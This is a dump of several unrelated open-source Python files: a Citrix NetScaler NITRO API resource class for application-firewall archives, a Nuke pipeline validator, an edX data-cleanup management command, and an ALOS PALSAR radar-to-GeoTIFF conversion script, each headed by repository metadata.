It is up to the caller that ensure that runners are compatible (both from
the same language implementation).
"""
def __init__(self, contender, baseline, threshold=DEFAULT_THRESHOLD):
self.contender = contender
self.baseline = baseline
self.threshold = threshold
@property
def comparisons(self):
contender = self.contender.suites
baseline = self.baseline.suites
suites = pairwise_compare(contender, baseline)
for suite_name, (suite_cont, suite_base) in suites:
benchmarks = pairwise_compare(
suite_cont.benchmarks, suite_base.benchmarks)
for _, (bench_cont, bench_base) in benchmarks:
yield BenchmarkComparator(bench_cont, bench_base,
threshold=self.threshold,
suite_name=suite_name)
|
mahabs/nitro | nssrc/com/citrix/netscaler/nitro/resource/config/appfw/appfwarchive.py | Python | apache-2.0 | 6,303 | 0.039029 | #
# Copyright (c) 2008-2015 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class appfwarchive(base_resource) :
""" Configuration for archive resource. """
def __init__(self) :
self._name = ""
self._target = ""
self._src = ""
self._comment = ""
self._response = ""
@property
def name(self) :
"""Name of tar archive.<br/>Minimum length = 1<br/>Maximum length = 31.
"""
try :
return self._name
except Exception as e:
raise e
@name.setter
def name(self, name) :
"""Name of tar archive.<br/>Minimum length = 1<br/>Maximum length = 31
"""
try :
self._name = name
except Exception as e:
raise e
@property
def target(self) :
"""Path to the file to be exported.<br/>Minimum length = 1<br/>Maximum length = 2047.
"""
try :
return self._target
except Exception as e:
raise e
@target.setter
def target(self, target) :
"""Path to the file to be exported.<br/>Minimum length = 1<br/>Maximum length = 2047
"""
try :
self._target = target
except Exception as e:
raise e
@property
def src(self) :
"""Indicates the source of the tar archive file as a URL
of the form
<protocol>://<host>[:<port>][/<path>]
<protocol> is http or https.
<host> is the DNS name or IP address of the http or https server.
<port> is the port number of the server. If omitted, the
default port for http or https will be used.
<path> is the path of the file on the server.
Import will fail if an https server requires client
certificate authentication.
.<br/>Minimum length = 1<br/>Maximum length = 2047.
"""
try :
return self._src
except Exception as e:
raise e
@src.setter
def src(self, src) :
"""Indicates the source of the tar archive file as a URL
of the form
<protocol>://<host>[:<port>][/<path>]
<protocol> is http or https.
<host> is the DNS name or IP address of the http or https server.
<port> is the port number of the server. If omitted, the
default port for http or https will be used.
<path> is the path of the file on the server.
Import will fail if an https server requires client
certificate authentication.
.<br/>Minimum length = 1<br/>Maximum length = 2047
"""
try :
self._src = src
except Exception as e:
raise e
@property
def comment(self) :
"""Comments associated with this archive.<br/>Maximum length = 128.
"""
try :
return self._comment
except Exception as e:
raise e
@comment.setter
def comment(self, comment) :
"""Comments associated with this archive.<br/>Maximum length = 128
"""
try :
self._comment = comment
except Exception as e:
raise e
@property
def response(self) :
try :
return self._response
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
""" converts nitro response into object and returns the object array in case of get request.
"""
try :
result = service.payload_formatter.string_to_resource(appfwarchive_response, response, self.__class__.__name__)
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.appfwarchive
except Exception as e :
raise e
def _get_object_name(self) :
""" Returns the value of object identifier argument
"""
try :
if (self.name) :
return str(self.name)
return None
except Exception as e :
raise e
@classmethod
def export(cls, client, resource) :
""" Use this API to export appfwarchive.
"""
try :
if type(resource) is not list :
exportresource = appfwarchive()
exportresource.name = resource.name
exportresource.target = resource.target
return exportresource.perform_operation(client,"export")
except Exception as e :
raise e
@classmethod
def Import(cls, client, resource) :
""" Use this API to Import appfwarchive.
"""
try :
if type(resource) is not list :
Importresource = appfwarchive()
Importresource.src = resource.src
Importresource.name = resource.name
Importresource.comment = resource.comment
return Importresource.perform_operation(client,"Import")
except Exception as e | :
raise e
@classmethod
def | delete(cls, client, resource) :
""" Use this API to delete appfwarchive.
"""
try :
if type(resource) is not list :
deleteresource = appfwarchive()
if type(resource) != type(deleteresource):
deleteresource.name = resource
else :
deleteresource.name = resource.name
return deleteresource.delete_resource(client)
except Exception as e :
raise e
@classmethod
def get(cls, client, name="", option_="") :
""" Use this API to fetch all the appfwarchive resources that are configured on netscaler.
"""
try :
if not name :
obj = appfwarchive()
response = obj.get_resources(client, option_)
return response
except Exception as e :
raise e
class appfwarchive_response(base_response) :
def __init__(self, length=1) :
self.appfwarchive = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.appfwarchive = [appfwarchive() for _ in range(length)]
|
Bumpybox/pyblish-bumpybox | pyblish_bumpybox/plugins/nuke/validate_datatype.py | Python | lgpl-3.0 | 1,133 | 0 | from pyblish import api
from pyblish_bumpybox import inventory
class ValidateDatatype(api.InstancePlugin):
    """Validate output datatype matches with input."""

    order = inventory.get_order(__file__, "ValidateDatatype")
    families = ["write"]
    label = "Datatype"
    optional = True
    targets = ["default", "process"]

    def process(self, instance):
        # Channel prefixes that carry data (normals, positions, reference
        # positions, UVs, motion vectors, mattes) and therefore need full
        # 32-bit precision on output.
        data_prefixes = (
            "N_Object",
            "N_World",
            "P_Object",
            "P_World",
            "Pref",
            "UV",
            "velocity",
            "cryptomatte",
        )

        # Collect every channel on the node that matches one of the
        # prefixes above (str.startswith accepts a tuple of options).
        flagged = [
            channel
            for channel in instance[0].channels()
            if channel.startswith(data_prefixes)
        ]

        if flagged:
            msg = (
                "There are 32-bit channels: {0}.\n\nConsider changing the"
                " output to 32-bit to preserve data.".format(flagged)
            )
            assert instance[0]["datatype"].value().startswith("32"), msg
|
beni55/edx-platform | lms/djangoapps/courseware/management/commands/remove_input_state.py | Python | agpl-3.0 | 6,715 | 0.004319 | '''
This is a one-off command aimed at fixing a temporary problem encountered where input_state was added to
the same dict object in capa problems, so was accumulating. The fix is simply to remove input_state entry
from state for all problems in the affected date range.
'''
import json
import logging
from optparse import make_option
from django.core.management.base import BaseCommand, CommandError
from django.db import transaction
from courseware.models import StudentModule, StudentModuleHistory
LOG = logging.getLogger(__name__)
class Command(BaseCommand):
    '''
    The fix here is to remove the "input_state" entry in the StudentModule objects of any problems that
    contain them.  No problem is yet making use of this, and the code should do the right thing if it's
    missing (by recreating an empty dict for its value).

    To narrow down the set of problems that might need fixing, the StudentModule
    objects to be checked is filtered down to those:

       created < '2013-03-29 16:30:00' (the problem must have been answered before the buggy code was reverted,
       on Prod and Edge)

       modified > '2013-03-28 22:00:00' (the problem must have been visited after the bug was introduced
       on Prod and Edge)

       state like '%input_state%' (the problem must have "input_state" set).

    This filtering is done on the production database replica, so that the larger select queries don't lock
    the real production database.  The list of id values for Student Modules is written to a file, and the
    file is passed into this command.  The sql file passed to mysql contains:

    select sm.id from courseware_studentmodule sm
        where sm.modified > "2013-03-28 22:00:00"
            and sm.created < "2013-03-29 16:30:00"
            and sm.state like "%input_state%"
            and sm.module_type = 'problem';
    '''
    # Running totals, reported in progress and final log messages.
    num_visited = 0
    num_changed = 0
    num_hist_visited = 0
    num_hist_changed = 0

    option_list = BaseCommand.option_list + (
        make_option('--save',
                    action='store_true',
                    dest='save_changes',
                    default=False,
                    help='Persist the changes that were encountered.  If not set, no changes are saved.'),
    )

    def fix_studentmodules_in_list(self, save_changes, idlist_path):
        '''Read in the list of StudentModule objects that might need fixing, and then fix each one'''
        # Use a context manager so the id-list file is closed even if a
        # lookup raises partway through (the file handle used to leak).
        with open(idlist_path, 'r') as idlist_file:
            for line in idlist_file:
                student_module_id = line.strip()
                # skip the header, if present:
                if student_module_id == 'id':
                    continue
                try:
                    module = StudentModule.objects.get(id=student_module_id)
                except StudentModule.DoesNotExist:
                    LOG.error(u"Unable to find student module with id = %s: skipping... ", student_module_id)
                    continue
                self.remove_studentmodule_input_state(module, save_changes)

                # History rows for the same module get the identical fix.
                hist_modules = StudentModuleHistory.objects.filter(student_module_id=student_module_id)
                for hist_module in hist_modules:
                    self.remove_studentmodulehistory_input_state(hist_module, save_changes)

                if self.num_visited % 1000 == 0:
                    LOG.info(" Progress: updated {0} of {1} student modules".format(self.num_changed, self.num_visited))
                    LOG.info(" Progress: updated {0} of {1} student history modules".format(self.num_hist_changed,
                                                                                           self.num_hist_visited))

    def _strip_input_state(self, module, save_changes):
        '''
        Remove the 'input_state' entry from the JSON state of `module`.

        Shared implementation for StudentModule and StudentModuleHistory
        rows (the two public wrappers below only differ in which counters
        they bump).

        Returns:
            None  -- the module has no state at all (row not counted as visited)
            False -- state exists but contains no 'input_state' entry
            True  -- 'input_state' is present (removed and saved when
                     save_changes is set; merely counted otherwise)
        '''
        module_state = module.state
        if module_state is None:
            # not likely, since we filter on it.  But in general...
            LOG.info("No state found for {type} module {id} for student {student} in course {course_id}"
                     .format(type=module.module_type, id=module.module_state_key,
                             student=module.student.username, course_id=module.course_id))
            return None

        state_dict = json.loads(module_state)
        if 'input_state' not in state_dict:
            return False
        if save_changes:
            # make the change and persist
            del state_dict['input_state']
            module.state = json.dumps(state_dict)
            module.save()
        # When not saving, the caller still counts the change that would
        # have been made.
        return True

    @transaction.autocommit
    def remove_studentmodule_input_state(self, module, save_changes):
        '''Remove the accumulated 'input_state' entry from a StudentModule's state'''
        changed = self._strip_input_state(module, save_changes)
        if changed is None:
            return
        self.num_visited += 1
        if changed:
            self.num_changed += 1

    @transaction.autocommit
    def remove_studentmodulehistory_input_state(self, module, save_changes):
        '''Remove the accumulated 'input_state' entry from a StudentModuleHistory row's state'''
        changed = self._strip_input_state(module, save_changes)
        if changed is None:
            return
        self.num_hist_visited += 1
        if changed:
            self.num_hist_changed += 1

    def handle(self, *args, **options):
        '''Handle management command request'''
        if len(args) != 1:
            raise CommandError("missing idlist file")

        idlist_path = args[0]
        save_changes = options['save_changes']
        LOG.info("Starting run: reading from idlist file {0}; save_changes = {1}".format(idlist_path, save_changes))

        self.fix_studentmodules_in_list(save_changes, idlist_path)

        LOG.info("Finished run:  updating {0} of {1} student modules".format(self.num_changed, self.num_visited))
        LOG.info("Finished run:  updating {0} of {1} student history modules".format(self.num_hist_changed,
                                                                                     self.num_hist_visited))
|
leandromet/Geoprocessamento---Geoprocessing | Palsar_HH_HV_to_RGB8bit.py | Python | mit | 4,323 | 0.018043 | """
#-------------------------------------------------------------------------------
# Name: ALOS HH, HV and RFDI on RGB 16signedint GEOTIFF
# Purpose: Calculates the RFDI , saves geotiff with HH, HV and RFDI layers
# in 8bit unsigned format, with values stretched for contrast enhancement.
# | Author: leandro.biondo@florestal.gov.br
#
# Created: 06/07/2015
# Copyright: (c) leandro.biondo 2015
# Licence: GPL
#-------------------------------------------------------------------------------
"""
import glob
| import gdal
from gdalconst import *
import osr
import numpy as np
from struct import *
import array
from scipy import ndimage
import math
import os
def exporta_alos_geoTIFF(arquivo, destino, refer):
pos = arquivo.find(refer)-1
lat = -1*int(arquivo[pos+6:pos+8])
lon = -1*int(arquivo[pos+9:pos+12])
f = open(arquivo, "rb")
print f
count = 0
print os.stat(arquivo).st_size
npa = np.fromfile(f, dtype=np.dtype('<H'))
f.close()
npa = npa.astype(np.float32)
npa = npa**2
npr = npa.reshape(4500,4500)
med9 = np.array([
[0.11,0.11,0.11],
[0.11,0.12,0.11],
[0.11,0.11,0.11],
])
#convolucao = ndimage.convolve(npr,med81)
#convolucao = ndimage.convolve(npr,med25)
convolucao = ndimage.convolve(npr,med9)
npalog = 10*np.log10(convolucao)-83
np.putmask(npalog, npalog<-500, -500)
npalog = npalog.reshape(4500,4500)
fv = open(arquivo.replace("HH","HV"), "rb")
print fv
count = 0
npav = np.fromfile(fv, dtype=np.dtype('<H'))
fv.close()
npav = npav.astype(np.float32)
npav = npav**2
nprv = npav.reshape(4500,4500)
#convolucao = ndimage.convolve(npr,med81)
#convolucao = ndimage.convolve(npr,med25)
convolucaov = ndimage.convolve(nprv,med9)
npalogv = 10*np.log10(convolucaov)-83
np.putmask(npalogv, npalogv<-500, -500)
npalogv = npalogv.reshape(4500,4500)
passer = True
rfdi = np.where ( passer, (1.*npalog - 1.*npalogv ) / ( 1.*npalog + 1.*npalogv ), -999 )
format = "GTiff"
driver = gdal.GetDriverByName( format )
metadata = driver.GetMetadata()
if metadata.has_key(gdal.DCAP_CREATE) \
and metadata[gdal.DCAP_CREATE] == 'YES':
print 'Driver %s supports Create() method.' % format
if metadata.has_key(gdal.DCAP_CREATECOPY) \
and metadata[gdal.DCAP_CREATECOPY] == 'YES':
print 'Driver %s supports CreateCopy() method.' % format
dst_ds = driver.Create( destino, 4500, 4500, 3, gdal.GDT_Byte, ['COMPRESS=LZW'] )
dst_ds.SetMetadataItem("DateTime", "2009:00:00")
dst_ds.SetGeoTransform( [ lon-0.000111111, 0.000222222, 0, lat-0.000111111, 0, -0.000222222 ] )
srs = osr.SpatialReference()
srs.SetWellKnownGeogCS( 'WGS84' )
dst_ds.SetProjection( srs.ExportToWkt() )
print "min", np.amin(npalog)
print np.amin(npalogv)
print np.amin(rfdi)
print "max", np.amax(npalog)
print np.amax(npalogv)
print np.amax(rfdi)
#new range
npalog=npalog+np.abs(np.amin(npalog))
npalogv=npalogv+np.abs(np.amin(npalogv))
rfdi=rfdi+np.abs(np.amin(rfdi))
npalog=(npalog-np.amin(npalog))*(255/((np.amax(npalog)-np.amin(npalog))))
npalogv=(npalogv-np.amin(npalogv))*(255/((np.amax(npalogv)-np.amin(npalogv))))
rfdi=(rfdi-np.amin(rfdi))*(255/((np.amax(rfdi)-np.amin(rfdi))))
print "minpos", np.amin(npalog)
print np.amin(npalogv)
print np.amin(rfdi)
print "maxpos", np.amax(npalog)
print np.amax(npalogv)
print np.amax(rfdi)
print "meanpos", np.mean(npalog, dtype=np.float64)
print np.mean(npalogv, dtype=np.float64)
print np.mean(rfdi, dtype=np.float64)
dst_ds.GetRasterBand(1).WriteArray(npalog.astype(int))
dst_ds.GetRasterBand(2).WriteArray(npalogv.astype(int))
dst_ds.GetRasterBand(3).WriteArray(rfdi.astype(int))
# Once we're done, close properly the dataset
dst_ds = None
print "Gerada imagem %s" %destino
c=0
for files in glob.glob("C:\\Biondo\\PALSAR_Catalogo\\2009\\RGB\\*sl_HH"):
entrada = files
saida = files+"_img.tif"
referencia = "RGB"
print entrada, ">>>",saida
exporta_alos_geoTIFF(entrada,saida,referencia)
c+=1
print c
#if c >= 1:
# break
print "end"
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.